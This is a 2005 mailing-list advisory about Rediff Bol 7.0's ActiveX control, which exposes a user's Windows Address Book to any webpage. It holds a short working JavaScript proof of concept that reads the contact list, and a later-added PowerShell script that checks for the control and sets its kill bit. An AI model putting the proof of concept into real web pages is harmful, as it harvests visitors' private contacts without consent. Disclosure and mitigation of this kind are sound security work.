Message-ID: <20050904075739.36354.qmail@web8508.mail.in.yahoo.com>
Date: Sun Sep  4 14:30:11 2005
From: viper31337 at yahoo.co.in (Gregory R. Panakkal)
Subject: Rediff Bol 7.0  WAB Contacts

Rediff Bol 7.0  WAB Contacts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected Program : Rediff Bol 7.0
It is a popular instant messenger from Rediff.com

Related URL : http://messenger.rediff.com/newbol/

Discovered by : Gregory R. Panakkal

Vulnerability Description :

Rediff Bol's ActiveX control (Fetch.FetchContact.1 / Fetch.dll) allows a webpage
to read the user's Windows Address Book (WAB) contacts. The method
"FullAddressBook" returns the WAB contact list in XML format.


Proof Of Concept:

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]

Online Demo:
http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html


rgds,
Gregory R. Panakkal
http://www.infogreg.com/
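
A defensive check for the control named above, added here as an example and not part of the original advisory: it resolves the `Fetch.FetchContact.1` ProgID to its CLSID from the local registry, reports whether the control is registered as safe for scripting, and with `-Apply` sets the Internet Explorer kill bit for it. The parameter and variable names are this example's own, and it assumes an elevated PowerShell prompt.

```powershell
# Added example (not from the advisory): audit and optionally kill-bit an ActiveX control.
# Run from an elevated prompt; without -Apply the script only reports.
param(
    [string]$ProgId = 'Fetch.FetchContact.1',   # ProgID named in the advisory
    [switch]$Apply                               # hypothetical switch: write the kill bit
)

$KillBit = 0x400   # "Compatibility Flags" bit that stops IE from instantiating the control
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting

# ProgID -> CLSID lookup; the CLSID is read from this machine, not assumed.
$clsidKey = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
if (-not (Test-Path $clsidKey)) {
    Write-Output "$ProgId is not registered on this machine."
    return
}
$clsid = (Get-Item $clsidKey).GetValue('')
Write-Output "$ProgId -> $clsid"

# A control in this category can be scripted by web pages without a prompt.
# A control may instead declare safety through IObjectSafety, which this check cannot see.
$catKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\Implemented Categories\$SafeForScripting"
Write-Output ("Registered safe for scripting: {0}" -f (Test-Path $catKey))

# The kill bit lives under both the native and the 32-bit (Wow6432Node) registry views.
$roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)
foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    $key = Join-Path $root $clsid
    $current = if (Test-Path $key) { [int](Get-Item $key).GetValue('Compatibility Flags', 0) } else { 0 }
    $killed = ($current -band $KillBit) -ne 0
    Write-Output "$key kill bit set: $killed"
    if ($Apply -and -not $killed) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($current -bor $KillBit) -Type DWord
        Write-Output "  kill bit written"
    }
}
```

The kill bit only prevents Internet Explorer from loading the control; it does not remove Fetch.dll or change how the messenger itself uses it.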




	

	
		